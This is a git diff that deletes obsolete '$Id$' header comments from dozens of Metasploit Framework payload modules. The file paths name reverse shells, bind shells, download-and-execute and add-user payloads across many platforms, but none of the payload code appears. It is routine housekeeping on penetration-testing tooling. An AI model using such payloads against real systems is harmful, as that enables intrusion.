b/modules/payloads/singles/bsdi/x86/shell_find_port.rb index 2b9bf789a3..1eee2d58d0 100644 --- a/modules/payloads/singles/bsdi/x86/shell_find_port.rb +++ b/modules/payloads/singles/bsdi/x86/shell_find_port.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/bsdi/x86/shell_reverse_tcp.rb b/modules/payloads/singles/bsdi/x86/shell_reverse_tcp.rb index e2e980d390..15313de703 100644 --- a/modules/payloads/singles/bsdi/x86/shell_reverse_tcp.rb +++ b/modules/payloads/singles/bsdi/x86/shell_reverse_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/cmd/unix/bind_inetd.rb b/modules/payloads/singles/cmd/unix/bind_inetd.rb index df12ca9e03..0ab4e031b5 100644 --- a/modules/payloads/singles/cmd/unix/bind_inetd.rb +++ b/modules/payloads/singles/cmd/unix/bind_inetd.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/cmd/unix/bind_netcat.rb b/modules/payloads/singles/cmd/unix/bind_netcat.rb index aea5392a12..6cdcc0e8cf 100644 --- a/modules/payloads/singles/cmd/unix/bind_netcat.rb +++ b/modules/payloads/singles/cmd/unix/bind_netcat.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/cmd/unix/bind_netcat_ipv6.rb b/modules/payloads/singles/cmd/unix/bind_netcat_ipv6.rb index 8a5c400356..5672706519 100644 --- a/modules/payloads/singles/cmd/unix/bind_netcat_ipv6.rb +++ b/modules/payloads/singles/cmd/unix/bind_netcat_ipv6.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/cmd/unix/bind_perl.rb b/modules/payloads/singles/cmd/unix/bind_perl.rb index 9c2af17181..a0f431af9f 100644 --- a/modules/payloads/singles/cmd/unix/bind_perl.rb +++ b/modules/payloads/singles/cmd/unix/bind_perl.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/cmd/unix/bind_perl_ipv6.rb b/modules/payloads/singles/cmd/unix/bind_perl_ipv6.rb index 42dc2deb78..c08b96aaed 100644 --- a/modules/payloads/singles/cmd/unix/bind_perl_ipv6.rb +++ b/modules/payloads/singles/cmd/unix/bind_perl_ipv6.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/cmd/unix/bind_ruby.rb b/modules/payloads/singles/cmd/unix/bind_ruby.rb index b65f70cf78..a08f2c29d6 100644 --- a/modules/payloads/singles/cmd/unix/bind_ruby.rb +++ b/modules/payloads/singles/cmd/unix/bind_ruby.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/cmd/unix/bind_ruby_ipv6.rb b/modules/payloads/singles/cmd/unix/bind_ruby_ipv6.rb index 9d61294626..a6fe97b8ea 100644 --- a/modules/payloads/singles/cmd/unix/bind_ruby_ipv6.rb +++ b/modules/payloads/singles/cmd/unix/bind_ruby_ipv6.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/cmd/unix/generic.rb b/modules/payloads/singles/cmd/unix/generic.rb index e5ecff7522..379f4c51bc 100644 --- a/modules/payloads/singles/cmd/unix/generic.rb +++ b/modules/payloads/singles/cmd/unix/generic.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/cmd/unix/interact.rb b/modules/payloads/singles/cmd/unix/interact.rb index b4ff6a881b..dd04b96158 100644 --- a/modules/payloads/singles/cmd/unix/interact.rb +++ b/modules/payloads/singles/cmd/unix/interact.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/cmd/unix/reverse.rb b/modules/payloads/singles/cmd/unix/reverse.rb index 17a8cfa886..d4e63fc555 100644 --- a/modules/payloads/singles/cmd/unix/reverse.rb +++ b/modules/payloads/singles/cmd/unix/reverse.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/cmd/unix/reverse_bash.rb b/modules/payloads/singles/cmd/unix/reverse_bash.rb index 865b496316..c2dc4fe1b5 100644 --- a/modules/payloads/singles/cmd/unix/reverse_bash.rb +++ b/modules/payloads/singles/cmd/unix/reverse_bash.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/cmd/unix/reverse_netcat.rb b/modules/payloads/singles/cmd/unix/reverse_netcat.rb index 5afee8c058..1a0caf787d 100644 --- a/modules/payloads/singles/cmd/unix/reverse_netcat.rb +++ b/modules/payloads/singles/cmd/unix/reverse_netcat.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/cmd/unix/reverse_perl.rb b/modules/payloads/singles/cmd/unix/reverse_perl.rb index 56c81e5482..5fed27b432 100644 --- a/modules/payloads/singles/cmd/unix/reverse_perl.rb +++ b/modules/payloads/singles/cmd/unix/reverse_perl.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/cmd/unix/reverse_ruby.rb b/modules/payloads/singles/cmd/unix/reverse_ruby.rb index 41b2524aec..2dc9b88f12 100644 --- a/modules/payloads/singles/cmd/unix/reverse_ruby.rb +++ b/modules/payloads/singles/cmd/unix/reverse_ruby.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/cmd/windows/adduser.rb b/modules/payloads/singles/cmd/windows/adduser.rb index fd2698b7a5..bd932f2099 100644 --- a/modules/payloads/singles/cmd/windows/adduser.rb +++ b/modules/payloads/singles/cmd/windows/adduser.rb @@ -1,5 +1,3 @@ -# $Id$ - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/cmd/windows/bind_perl.rb b/modules/payloads/singles/cmd/windows/bind_perl.rb index e4009a30a1..8c0000aa46 100644 --- a/modules/payloads/singles/cmd/windows/bind_perl.rb +++ b/modules/payloads/singles/cmd/windows/bind_perl.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/cmd/windows/bind_perl_ipv6.rb b/modules/payloads/singles/cmd/windows/bind_perl_ipv6.rb index 9ab31a28f5..21014511e9 100644 --- a/modules/payloads/singles/cmd/windows/bind_perl_ipv6.rb +++ b/modules/payloads/singles/cmd/windows/bind_perl_ipv6.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/cmd/windows/bind_ruby.rb b/modules/payloads/singles/cmd/windows/bind_ruby.rb index 51a33adbab..8f619eecfa 100644 --- a/modules/payloads/singles/cmd/windows/bind_ruby.rb +++ b/modules/payloads/singles/cmd/windows/bind_ruby.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/cmd/windows/download_eval_vbs.rb b/modules/payloads/singles/cmd/windows/download_eval_vbs.rb index 27d525a5b5..3e0b8438a1 100644 --- a/modules/payloads/singles/cmd/windows/download_eval_vbs.rb +++ b/modules/payloads/singles/cmd/windows/download_eval_vbs.rb @@ -1,5 +1,3 @@ -# $Id$ - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/cmd/windows/download_exec_vbs.rb b/modules/payloads/singles/cmd/windows/download_exec_vbs.rb index 4e82323710..82e610922f 100644 --- a/modules/payloads/singles/cmd/windows/download_exec_vbs.rb +++ b/modules/payloads/singles/cmd/windows/download_exec_vbs.rb @@ -1,5 +1,3 @@ -# $Id$ - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/cmd/windows/reverse_perl.rb b/modules/payloads/singles/cmd/windows/reverse_perl.rb index b1f367e93d..7e150d657a 100644 --- a/modules/payloads/singles/cmd/windows/reverse_perl.rb +++ b/modules/payloads/singles/cmd/windows/reverse_perl.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/cmd/windows/reverse_ruby.rb b/modules/payloads/singles/cmd/windows/reverse_ruby.rb index 1ad6f6fcf2..7f71cd3001 100644 --- a/modules/payloads/singles/cmd/windows/reverse_ruby.rb +++ b/modules/payloads/singles/cmd/windows/reverse_ruby.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/generic/custom.rb b/modules/payloads/singles/generic/custom.rb index c91f585520..cd49cb226c 100644 --- a/modules/payloads/singles/generic/custom.rb +++ b/modules/payloads/singles/generic/custom.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/generic/debug_trap.rb b/modules/payloads/singles/generic/debug_trap.rb index 2deb0398a9..31777a8380 100644 --- a/modules/payloads/singles/generic/debug_trap.rb +++ b/modules/payloads/singles/generic/debug_trap.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/generic/shell_bind_tcp.rb b/modules/payloads/singles/generic/shell_bind_tcp.rb index a295527af3..9abb11086d 100644 --- a/modules/payloads/singles/generic/shell_bind_tcp.rb +++ b/modules/payloads/singles/generic/shell_bind_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/generic/shell_reverse_tcp.rb b/modules/payloads/singles/generic/shell_reverse_tcp.rb index 0d1dd741d9..ad59e07cf3 100644 --- a/modules/payloads/singles/generic/shell_reverse_tcp.rb +++ b/modules/payloads/singles/generic/shell_reverse_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/generic/tight_loop.rb b/modules/payloads/singles/generic/tight_loop.rb index 47ac326c88..55b7ed0487 100644 --- a/modules/payloads/singles/generic/tight_loop.rb +++ b/modules/payloads/singles/generic/tight_loop.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/java/jsp_shell_bind_tcp.rb b/modules/payloads/singles/java/jsp_shell_bind_tcp.rb index 2794f03259..81c06e1c2f 100644 --- a/modules/payloads/singles/java/jsp_shell_bind_tcp.rb +++ b/modules/payloads/singles/java/jsp_shell_bind_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file in part of the Metasploit Framework and may be subject to # redintribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/java/jsp_shell_reverse_tcp.rb b/modules/payloads/singles/java/jsp_shell_reverse_tcp.rb index f3b8137b9a..129d2fda3f 100644 --- a/modules/payloads/singles/java/jsp_shell_reverse_tcp.rb +++ b/modules/payloads/singles/java/jsp_shell_reverse_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file in part of the Metasploit Framework and may be subject to # redintribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/java/shell_reverse_tcp.rb b/modules/payloads/singles/java/shell_reverse_tcp.rb index 82b6889ea0..9ec5d1fb8b 100644 --- a/modules/payloads/singles/java/shell_reverse_tcp.rb +++ b/modules/payloads/singles/java/shell_reverse_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/linux/armle/adduser.rb b/modules/payloads/singles/linux/armle/adduser.rb index d647e1aae7..c70bda4ceb 100644 --- a/modules/payloads/singles/linux/armle/adduser.rb +++ b/modules/payloads/singles/linux/armle/adduser.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/linux/armle/exec.rb b/modules/payloads/singles/linux/armle/exec.rb index 44f9bd3c8c..0ef9335901 100644 --- a/modules/payloads/singles/linux/armle/exec.rb +++ b/modules/payloads/singles/linux/armle/exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/linux/armle/shell_reverse_tcp.rb b/modules/payloads/singles/linux/armle/shell_reverse_tcp.rb index 0841e716d8..d810f36d00 100644 --- a/modules/payloads/singles/linux/armle/shell_reverse_tcp.rb +++ b/modules/payloads/singles/linux/armle/shell_reverse_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/linux/mipsbe/shell_reverse_tcp.rb b/modules/payloads/singles/linux/mipsbe/shell_reverse_tcp.rb index cd95b7659c..3676f489de 100644 --- a/modules/payloads/singles/linux/mipsbe/shell_reverse_tcp.rb +++ b/modules/payloads/singles/linux/mipsbe/shell_reverse_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb b/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb index 85cb4a0e2d..c6c0f0ea75 100644 --- a/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb +++ b/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/linux/ppc/shell_bind_tcp.rb b/modules/payloads/singles/linux/ppc/shell_bind_tcp.rb index 10921d5706..b4bba4e6fd 100644 --- a/modules/payloads/singles/linux/ppc/shell_bind_tcp.rb +++ b/modules/payloads/singles/linux/ppc/shell_bind_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/linux/ppc/shell_find_port.rb b/modules/payloads/singles/linux/ppc/shell_find_port.rb index aac94ed52d..57cd7f86cc 100644 --- a/modules/payloads/singles/linux/ppc/shell_find_port.rb +++ b/modules/payloads/singles/linux/ppc/shell_find_port.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/linux/ppc/shell_reverse_tcp.rb b/modules/payloads/singles/linux/ppc/shell_reverse_tcp.rb index 232f896895..4a5822c009 100644 --- a/modules/payloads/singles/linux/ppc/shell_reverse_tcp.rb +++ b/modules/payloads/singles/linux/ppc/shell_reverse_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/linux/ppc64/shell_bind_tcp.rb b/modules/payloads/singles/linux/ppc64/shell_bind_tcp.rb index aaa00a04a8..8a10844c49 100644 --- a/modules/payloads/singles/linux/ppc64/shell_bind_tcp.rb +++ b/modules/payloads/singles/linux/ppc64/shell_bind_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/linux/ppc64/shell_find_port.rb b/modules/payloads/singles/linux/ppc64/shell_find_port.rb index 1997390010..60886a9d6e 100644 --- a/modules/payloads/singles/linux/ppc64/shell_find_port.rb +++ b/modules/payloads/singles/linux/ppc64/shell_find_port.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/linux/ppc64/shell_reverse_tcp.rb b/modules/payloads/singles/linux/ppc64/shell_reverse_tcp.rb index aea0f1905c..7f13db99c7 100644 --- a/modules/payloads/singles/linux/ppc64/shell_reverse_tcp.rb +++ b/modules/payloads/singles/linux/ppc64/shell_reverse_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/linux/x64/exec.rb b/modules/payloads/singles/linux/x64/exec.rb index f37f297e15..48c6718072 100644 --- a/modules/payloads/singles/linux/x64/exec.rb +++ b/modules/payloads/singles/linux/x64/exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/linux/x64/shell_bind_tcp.rb b/modules/payloads/singles/linux/x64/shell_bind_tcp.rb index 011d78bcf3..24b14e3bb9 100644 --- a/modules/payloads/singles/linux/x64/shell_bind_tcp.rb +++ b/modules/payloads/singles/linux/x64/shell_bind_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/linux/x64/shell_find_port.rb b/modules/payloads/singles/linux/x64/shell_find_port.rb index 513c4751f1..4c2f82c51f 100644 --- a/modules/payloads/singles/linux/x64/shell_find_port.rb +++ b/modules/payloads/singles/linux/x64/shell_find_port.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/linux/x64/shell_reverse_tcp.rb b/modules/payloads/singles/linux/x64/shell_reverse_tcp.rb index 00b99bb387..521139f06e 100644 --- a/modules/payloads/singles/linux/x64/shell_reverse_tcp.rb +++ b/modules/payloads/singles/linux/x64/shell_reverse_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/linux/x86/adduser.rb b/modules/payloads/singles/linux/x86/adduser.rb index 5e7f59f279..e9657cb748 100644 --- a/modules/payloads/singles/linux/x86/adduser.rb +++ b/modules/payloads/singles/linux/x86/adduser.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/linux/x86/chmod.rb b/modules/payloads/singles/linux/x86/chmod.rb index 244bd6bbf7..d27acb8945 100644 --- a/modules/payloads/singles/linux/x86/chmod.rb +++ b/modules/payloads/singles/linux/x86/chmod.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/linux/x86/exec.rb b/modules/payloads/singles/linux/x86/exec.rb index 805283a8f5..20ba8e8481 100644 --- a/modules/payloads/singles/linux/x86/exec.rb +++ b/modules/payloads/singles/linux/x86/exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/linux/x86/metsvc_bind_tcp.rb b/modules/payloads/singles/linux/x86/metsvc_bind_tcp.rb index f9fe8c5527..71fda53e43 100644 --- a/modules/payloads/singles/linux/x86/metsvc_bind_tcp.rb +++ b/modules/payloads/singles/linux/x86/metsvc_bind_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/linux/x86/metsvc_reverse_tcp.rb b/modules/payloads/singles/linux/x86/metsvc_reverse_tcp.rb index f53daf1c78..bd6a4944be 100644 --- a/modules/payloads/singles/linux/x86/metsvc_reverse_tcp.rb +++ b/modules/payloads/singles/linux/x86/metsvc_reverse_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/linux/x86/shell_bind_ipv6_tcp.rb b/modules/payloads/singles/linux/x86/shell_bind_ipv6_tcp.rb index dabd9490e4..7205514d16 100644 --- a/modules/payloads/singles/linux/x86/shell_bind_ipv6_tcp.rb +++ b/modules/payloads/singles/linux/x86/shell_bind_ipv6_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/linux/x86/shell_bind_tcp.rb b/modules/payloads/singles/linux/x86/shell_bind_tcp.rb index f1b167acff..82b1dbcefd 100644 --- a/modules/payloads/singles/linux/x86/shell_bind_tcp.rb +++ b/modules/payloads/singles/linux/x86/shell_bind_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/linux/x86/shell_find_port.rb b/modules/payloads/singles/linux/x86/shell_find_port.rb index 37c18bcdc4..f889e65d21 100644 --- a/modules/payloads/singles/linux/x86/shell_find_port.rb +++ b/modules/payloads/singles/linux/x86/shell_find_port.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/linux/x86/shell_find_tag.rb b/modules/payloads/singles/linux/x86/shell_find_tag.rb index 9aaf5b8085..df5ac66edc 100644 --- a/modules/payloads/singles/linux/x86/shell_find_tag.rb +++ b/modules/payloads/singles/linux/x86/shell_find_tag.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/linux/x86/shell_reverse_tcp.rb b/modules/payloads/singles/linux/x86/shell_reverse_tcp.rb index 9993974e64..b42f233e1a 100644 --- a/modules/payloads/singles/linux/x86/shell_reverse_tcp.rb +++ b/modules/payloads/singles/linux/x86/shell_reverse_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/linux/x86/shell_reverse_tcp2.rb b/modules/payloads/singles/linux/x86/shell_reverse_tcp2.rb index 43b011afc9..c01f0246f1 100644 --- a/modules/payloads/singles/linux/x86/shell_reverse_tcp2.rb +++ b/modules/payloads/singles/linux/x86/shell_reverse_tcp2.rb @@ -1,6 +1,3 @@ -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/osx/armle/shell_bind_tcp.rb b/modules/payloads/singles/osx/armle/shell_bind_tcp.rb index db2769afa1..eac2ede26f 100644 --- a/modules/payloads/singles/osx/armle/shell_bind_tcp.rb +++ b/modules/payloads/singles/osx/armle/shell_bind_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/osx/armle/shell_reverse_tcp.rb b/modules/payloads/singles/osx/armle/shell_reverse_tcp.rb index 7001ad36b7..dfd890453d 100644 --- a/modules/payloads/singles/osx/armle/shell_reverse_tcp.rb +++ b/modules/payloads/singles/osx/armle/shell_reverse_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/osx/armle/vibrate.rb b/modules/payloads/singles/osx/armle/vibrate.rb index 0daea087e2..78e1e94b12 100644 --- a/modules/payloads/singles/osx/armle/vibrate.rb +++ b/modules/payloads/singles/osx/armle/vibrate.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/osx/ppc/shell_bind_tcp.rb b/modules/payloads/singles/osx/ppc/shell_bind_tcp.rb index 02e7b62787..b09ba6bf37 100644 --- a/modules/payloads/singles/osx/ppc/shell_bind_tcp.rb +++ b/modules/payloads/singles/osx/ppc/shell_bind_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/osx/ppc/shell_reverse_tcp.rb b/modules/payloads/singles/osx/ppc/shell_reverse_tcp.rb index 4af230e9dd..7f725789cf 100644 --- a/modules/payloads/singles/osx/ppc/shell_reverse_tcp.rb +++ b/modules/payloads/singles/osx/ppc/shell_reverse_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/osx/x64/exec.rb b/modules/payloads/singles/osx/x64/exec.rb index 0182620c3b..52ddade53b 100644 --- a/modules/payloads/singles/osx/x64/exec.rb +++ b/modules/payloads/singles/osx/x64/exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/osx/x86/exec.rb b/modules/payloads/singles/osx/x86/exec.rb index 7e1066558b..5b765dc65f 100644 --- a/modules/payloads/singles/osx/x86/exec.rb +++ b/modules/payloads/singles/osx/x86/exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/osx/x86/shell_bind_tcp.rb b/modules/payloads/singles/osx/x86/shell_bind_tcp.rb index 5596edd202..fc8031c227 100644 --- a/modules/payloads/singles/osx/x86/shell_bind_tcp.rb +++ b/modules/payloads/singles/osx/x86/shell_bind_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/osx/x86/shell_find_port.rb b/modules/payloads/singles/osx/x86/shell_find_port.rb index 09b30939c0..4ed43089e8 100644 --- a/modules/payloads/singles/osx/x86/shell_find_port.rb +++ b/modules/payloads/singles/osx/x86/shell_find_port.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/osx/x86/shell_reverse_tcp.rb b/modules/payloads/singles/osx/x86/shell_reverse_tcp.rb index 0930e45d5f..24777e497d 100644 --- a/modules/payloads/singles/osx/x86/shell_reverse_tcp.rb +++ b/modules/payloads/singles/osx/x86/shell_reverse_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/osx/x86/vforkshell_bind_tcp.rb b/modules/payloads/singles/osx/x86/vforkshell_bind_tcp.rb index 59fc2a610d..d8214498f7 100644 --- a/modules/payloads/singles/osx/x86/vforkshell_bind_tcp.rb +++ b/modules/payloads/singles/osx/x86/vforkshell_bind_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/payloads/singles/osx/x86/vforkshell_reverse_tcp.rb 